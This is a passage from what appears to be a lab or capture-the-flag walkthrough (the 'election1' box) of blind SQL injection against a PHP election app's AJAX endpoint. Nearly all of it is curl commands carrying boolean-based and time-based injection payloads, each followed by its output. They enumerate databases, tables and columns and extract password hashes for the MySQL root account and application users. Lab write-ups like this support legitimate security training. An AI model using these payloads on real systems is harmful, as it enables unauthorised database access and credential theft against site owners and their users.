└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND password="bb113886b0513a9d882e3caa5cd73314") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	15%

Password hash of the Love user is bb113886b0513a9d882e3caa5cd73314. The password of the Love account was already disclosed in the card.php file.

mysql DB (Boolean-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="mysql")=30 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

Using count function, there are a total of 30 tables within the mysql DB

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="mysql" AND table_name LIKE "use%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.07s
user	0.01s
sys	0.00s
cpu	11%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="mysql" AND table_name="user") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"  
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	15%

The default mysql.user table.

mysql.user Table (Boolean-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user")=46 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"         
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.06s
user	0.01s
sys	0.00s
cpu	13%

Using count function, there are a total of 46 columns within the mysql.user table.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user" AND column_name LIKE "use%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user" AND column_name="user") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	15%

mysql.user.user column identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user" AND column_name="password") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE LENGTH(password)=41) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"       
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%

mysql.user.password column identified and it’s 41 characters in length.

mysql.user Credential Exfiltration (Boolean-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="root") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%

root user identified in the mysql.user.user column

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="root" AND password LIKE "*%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.07s
user	0.01s
sys	0.00s
cpu	10%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="root" AND password LIKE "*9CFBBC772F3F6C%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"  
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="root" AND password="*9CFBBC772F3F6C106020035386DA5BBBF1249A11") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

9CFBBC772F3F6C106020035386DA5BBBF1249A11 is the password hash of the root user. NOTICE the prefix * character.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="newuser") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"       
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.06s
user	0.00s
sys	0.00s
cpu	13%

newuser user identified in the mysql.user.user column

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="newuser" AND password LIKE "*2470C0C06DEE42FD16%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM mysql.user WHERE user="newuser" AND password="*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	16%

2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 is the password of the newuser user. Password cracked.

Time-based Blind

If boolean-based attack works, time-based attack INHERENTLY works. Just need to wrap up the boolean-based SQLi payload with IF() and SLEEP()

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo 'SLEEP(2)-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '(CASE WHEN (1=1) THEN SLEEP(2) ELSE 1 END)-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

Confirmed.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM dual WHERE user() LIKE "new%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM dual WHERE user()="newuser@localhost"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

The current user is newuser@localhost. FROM dual is for dummy table as a placeholder and may be omitted.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) WHERE database() LIKE "ele%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) WHERE database()="election"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

The current database is election.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) WHERE version() LIKE "10%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) WHERE version()="10.1.44-MariaDB-0ubuntu0.18.04.1"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%

The backend DB version is 10.1.44-MariaDB-0ubuntu0.18.04.1.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF(EXISTS(SELECT 1 FROM dual WHERE database()="election"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF(EXISTS(SELECT 1 WHERE user()="newuser@localhost"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

EXISTS clause may also be used instead as it could be more reliable.

Databases (Time-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(schema_name) FROM information_schema.schemata)=4, SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"                 
{"code":"404"}
real	2.06s
user	0.00s
sys	0.00s
cpu	0%

Using count function, there are a total of 4 databases

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name LIKE "e%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="election"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

election DB, which is the current DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="information_schema"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

The default information_schema DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="performance_schema"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

The default performance_schema DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="mysql"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

The default mysql DB.

election DB (Time-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="election")=8, SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

Using count function, there are a total of 8 tables within the election DB

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name LIKE "tb%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name="tb_panitia"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%

election.tb_panitia table identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name="tb_pengaturan"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

election.tb_pengaturan table identified.

election.tb_panitia Table (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia")=5, SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"           
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

Using count function, there are a total of 5 columns within the election.tb_panitia table.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name LIKE "passwo%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name="password"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

election.tb_panitia.password column identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name LIKE "nam%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"    
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name="nama"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

election.tb_panitia.nama column identified.

election.tb_panitia Credential Exfiltration (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM election.tb_panitia WHERE nama LIKE "L%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"      
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

Love user in the election.tb_panitia.nama column.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND LENGTH(password)=32), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

Length of the Love user’s password is 32 character.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND password LIKE "bb113886b0513a9d%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND password="bb113886b0513a9d882e3caa5cd73314"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

Password hash of the Love user is bb113886b0513a9d882e3caa5cd73314. The password of the Love account was already disclosed in the card.php file.

mysql DB (Time-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="mysql")=30, SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%

Using count function, there are a total of 30 tables within the mysql DB

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="mysql" AND table_name="user"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

The default mysql.user table.

mysql.user Table (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user")=46, SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"       
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%

Using count function, there are a total of 46 columns within the mysql.user table.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user" AND column_name="user"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.06s
user	0.00s
sys	0.00s
cpu	0%

mysql.user.user column identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user" AND column_name="password"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE LENGTH(password)=41), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

mysql.user.password column identified and it’s 41 characters in length.

mysql.user Credential Exfiltration (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="root"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

root user identified in the mysql.user.user column

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="root" AND password LIKE "*9CFBBC772F3F6C%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
